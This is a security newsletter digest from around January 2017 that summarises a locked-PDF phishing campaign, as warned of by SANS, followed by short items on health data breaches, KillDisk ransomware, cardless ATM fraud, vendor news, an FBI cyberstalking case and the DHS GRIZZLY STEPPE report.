Scam Of The Week: Locked PDF Phishing Attack
SANS Internet Storm Center warned about an active phishing campaign that has malicious PDF attachments in a new scam to steal email credentials.
The SANS bulletin said that the email has the subject line “Assessment document” and the body contains a single PDF attachment that claims to be locked. A message reads: “PDF Secure File UNLOCK to Access File Content.”
John Bambenek, handler at SANS Internet Storm Center said: “This is an untargeted phishing campaign. They are not going after the most sophisticated users. They are going after Joe Cubicle that may not think twice about entering credentials to unlock a PDF,”
This is a large spray-and-pray campaign that hopes to get a small foothold into your org via an email account and then compromise, tunnel in or send spear-phishing attacks. Here is how it looks:
The email claims it’s from VetMeds and the PDF is identified as a VetMeds assessment. Once opened, the contents of the one-page PDF indicates that the document is a SWIFT (Society for Worldwide Interbank Financial Telecommunication) banking transaction.
“It doesn’t matter what email address or password you input into the fake unlocking mechanism. The document is opened and anything you input is transmitted to the spammer,” Bambenek said.
Workstations that use the Adobe PDF reader are cautioned via a security warning dialogue box before opening. The Adobe message reads: “The document is trying to connect to… If you trust the site, choose Allow. If you do not trust the site, choose Block.”
However, Bambenek points out that Windows 10 by default uses the Edge browser, and when Edge opens the VetMeds PDF, unlike with Adobe, no warning message is presented to the user.
Read full article: https://blog.knowbe4.com/scam-of-the-week-locked-pdf-phishing-attack
Security Headlines
HealthcareinfoSecurity – Analysis: 2016 Health Data Breaches, and What’s Ahead
“Hacking is just getting rolling in healthcare, or probably more accurately, just beginning to be recognized more often,” says Mac McMillan, CEO of the security consulting firm CynergisTek.
Experts say the healthcare sector should be prepared to deal with more ransomware attacks as well as other types of extortion attempts in 2017, as well as an uptick in distributed denial-of-service assaults and security breaches involving internet of things devices.
https://www.healthcareinfosecurity.com/analysis-2016-health-data-breaches-whats-ahead-a-9615
BankinfoSecurity – Linux KillDisk Ransomware Can’t Decrypt
Disk-wiping malware known as KillDisk, which has previously been used in hack attacks tied to espionage operations, has been given an update. Now, the malware works on Linux as well as Windows systems and also includes the ability to encrypt files, demand a bitcoin ransom and leave Linux systems unbootable.
https://www.bankinfosecurity.com/linux-killdisk-ransomware-cant-decrypt-a-9619
Krebsonsecrurity – Stolen Passwords Fuel Cardless ATM Fraud
Some financial institutions are now offering so-called “cardless ATM” transactions that allow customers to withdraw cash using nothing more than their mobile phones. But as the following story illustrates, this new technology also creates an avenue for thieves to quickly and quietly convert stolen customer bank account usernames and passwords into cold hard cash. Worse still, fraudulent cardless ATM withdrawals may prove more difficult for customers to dispute because they place the victim at the scene of the crime.
https://krebsonsecurity.com/2017/01/stolen-passwords-fuel-cardless-atm-fraud/
Bloomberg – Verizon wobbles over Yahoo deal
More bad news for Yahoo to start the new year after it revealed the biggest data breach in history last month: the planned acquisition of the company by Verizon, agreed last year, now looks as if it might be uncertain.
Vendor Information
Sophos – XG Firewall Home Edition
Our Free Home Use XG Firewall is a fully equipped software version of the Sophos XG firewall, available at no cost for home users – no strings attached. Features full protection for your home network, including anti-malware, web security and URL filtering, application control, IPS, traffic shaping, VPN, reporting and monitoring, and much more.
https://www.sophos.com/en-us/products/free-tools/sophos-xg-firewall-home-edition.aspx
Microsoft – Rumors of Cmd’s death have been greatly exaggerated (Thx to Bill Bryant for story)
This post is in response to a story published on December 6th 2016 by ComputerWorld titled “Say goodbye to the MS-DOS command prompt” and its follow-up article “Follow-up: MS-DOS lives on after all“.
These “stories” were subsequently picked up by Business Insider and Life Hacker among others and fueled a number of concerned Tweets some of which I responded to directly, along with much discussion on Reddit, Hacker News, and elsewhere. It also resulted in several customers/partners sending me concerned emails asking if this “news” was true.
Security Bulletins from the FBI and DHS
FBI – Cyberstalking – Woman Sentenced for Harassing Victim on Social Media
The messages were relentless. A California woman couldn’t escape the barrage of malicious texts, phone calls, and social media posts originating from a mysterious individual with whom she had no previous connection.
The harassment didn’t stop until the FBI intervened and uncovered a trail of threats and extortion that led to a Miami college student—who is now behind bars for cyberstalking.
“An unwanted relationship was being pushed on a victim who ultimately felt terrorized by an obsessed individual she didn’t even know,” said Assistant U.S. Attorney Jodi Anton, who supported the FBI during the investigation. “The constant intimidation was destroying her life, to the point where she could barely function at work and considered suicide.”
https://www.fbi.gov/news/stories/woman-sentenced-for-cyberstalking
DHS – GRIZZLY STEPPE – Russian Malicious Cyber Activity
This Joint Analysis Report (JAR) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This document provides technical details regarding the tools and infrastructure used by the Russian civilian and military intelligence Services (RIS) to compromise and exploit networks and endpoints associated with the U.S. election, as well as a range of U.S. Government, political, and private sector entities. The U.S. Government is referring to this malicious cyber activity by RIS as GRIZZLY STEPPE.
